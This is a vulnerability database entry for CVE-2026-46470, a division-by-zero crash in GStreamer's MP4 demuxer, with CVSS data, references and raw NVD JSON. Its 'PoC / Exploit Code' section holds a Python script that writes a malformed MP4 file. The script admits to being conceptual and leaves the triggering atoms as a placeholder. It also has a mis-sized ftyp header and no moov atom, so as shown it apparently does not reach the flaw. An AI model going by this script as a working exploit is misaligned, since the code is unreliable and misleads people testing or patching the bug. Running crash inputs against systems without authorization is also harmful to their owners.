CVE-2026-46470

Description

An issue was discovered in GStreamer gst-plugins-good before 1.28.2. When parsing MP4 audio tracks, the isomp4 plugin's qtdemux_audio_caps function does not sufficiently validate atom data before performing division operations, leading to denial of service due to integer division by zero.

CVSS Details

CVSS Score

4.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

GStreamer gst-plugins-good < 1.28.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# PoC script to generate a malformed MP4 file triggering the division by zero
# This is a conceptual PoC. The exact atom structure needs to match the vulnerable code path.

def create_poc(filename):
    with open(filename, 'wb') as f:
        # Write minimal MP4 header (ftyp)
        f.write(b'\x00\x00\x00\x20\x66\x74\x79\x70')
        f.write(b'mp42' + b'\x00\x00\x00\x00')
        f.write(b'mp42' + b'\x00\x00\x00\x00')
        
        # Write a malformed 'moov' atom
        # The vulnerability is in qtdemux_audio_caps, likely within 'stsd' or similar audio description atoms.
        # We inject a zero value where a divisor is expected.
        
        moov_content = b''
        # ... (construction of specific atoms causing the issue) ...
        
        # Example malicious atom header (Size = 0x100, Type = 'mdat' or relevant audio atom)
        # The actual payload would contain the zero divisor.
        malicious_atom = struct.pack('>I', 0x100) + b'stsd' + (b'\x00' * 240)
        
        f.write(malicious_atom)

if __name__ == "__main__":
    create_poc("cve_2026_46470_poc.mp4")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-46470
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-46470
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-46470/
[4] VulDB https://vuldb.com/cve/CVE-2026-46470
[5] https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/11243.patch
[6] https://gstreamer.freedesktop.org/security/sa-2026-0018.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-46470", "sourceIdentifier": "[email protected]", "published": "2026-05-14T18:16:50.790", "lastModified": "2026-05-14T18:24:08.747", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in GStreamer gst-plugins-good before 1.28.2. When parsing MP4 audio tracks, the isomp4 plugin's qtdemux_audio_caps function does not sufficiently validate atom data before performing division operations, leading to denial of service due to integer division by zero."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-369"}]}], "references": [{"url": "https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/11243.patch", "source": "[email protected]"}, {"url": "https://gstreamer.freedesktop.org/security/sa-2026-0018.html", "source": "[email protected]"}]}}